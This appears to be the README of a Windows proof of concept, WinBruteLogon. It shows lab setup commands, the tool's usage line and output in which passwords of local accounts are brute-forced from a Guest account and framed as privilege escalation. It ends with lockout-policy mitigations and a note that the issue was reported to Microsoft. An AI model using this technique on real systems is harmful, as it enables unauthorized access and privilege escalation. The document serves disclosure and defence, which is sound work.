Release date: 2020-05-14
Target: Windows XP to Latest Windows 10 Version (1909)
Weakness location : LogonUserA
, LogonUserW
, CreateProcessWithLogonA
, CreateProcessWithLogonW
This PoC is more what I would call a serious weakness in Microsoft Windows Authentication mechanism than a vulnerability.
The biggest issue is related to the lack of privilege required to perform such actions.
Indeed, from a Guest account (The most limited account on Microsoft Windows), you can crack the password of any available local users.
Find out which users exists using command : net user
This PoC is using multithreading to speed up the process and support both 32 and 64bit.
Tested on Windows 10
Install and configure a freshly updated Windows 10 virtual or physical machine.
In my case full Windows version was : 1909 (OS Build 18363.778)
Log as administrator and lets create two different accounts : one administrator and one regular user. Both users are local.
/!\ Important notice: I used the Guest account for the demo but this PoC is not only limited to Guest account, it will work from any account / group (guest user / regular user / admin user etc...)
net user darkcodersc /add
net user darkcodersc trousers
(trousers is the password)
net localgroup administrators darkcodersc /add
net user HackMe /add
net user HackMe ozlq6qwm
(ozlq6qwm is the password)
net user Guest /add /active:yes
net localgroup users Guest /delete
net user Guest /add /active:yes
In my case both trousers
and ozlq6qwm
are in SecList : https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt
Logoff from administrator account or restart your machine and log to the Guest account.
Place the PoC executable anywhere you have access as Guest user.
Usage : WinBruteLogon.exe -v -u <username> -w <wordlist_file>
-v
is optional, it design the verbose mode.
By default, domain name is the value designated by %USERDOMAIN%
env var. You can specify a custom name with option -d
prompt(guest)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt
Wait few seconds to see the following result:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=2260, handle=364
[INFO] New "TWorker" Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.
[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
prompt(guest)>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt
Wait few seconds to see the following result:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=5748, handle=336
[INFO] New "TWorker" Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.
[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
If you gain access to a low privileged user, you could crack the password of a more privileged user and escalate your privilege.
- Disable guest(s) account(s) if present.
- Application white-listing.
- Follow the guidelines to create and keep a password strong. Apply this to all users.
Open secpol.msc
then go to Account Policies
> Account Lockout Policy
and edit value Account lockout threshold
with desired value from (1 to 999).
Value represent the number of possible attempt before getting locked.
/!\ LockDown Policy wont work on Administrator account. At this moment, best protection for Administrator account (if Enabled) is to setup a very complex password.
A report was sent to Microsoft Security Team.
They should at least implement by default account lockout. Actually it is not.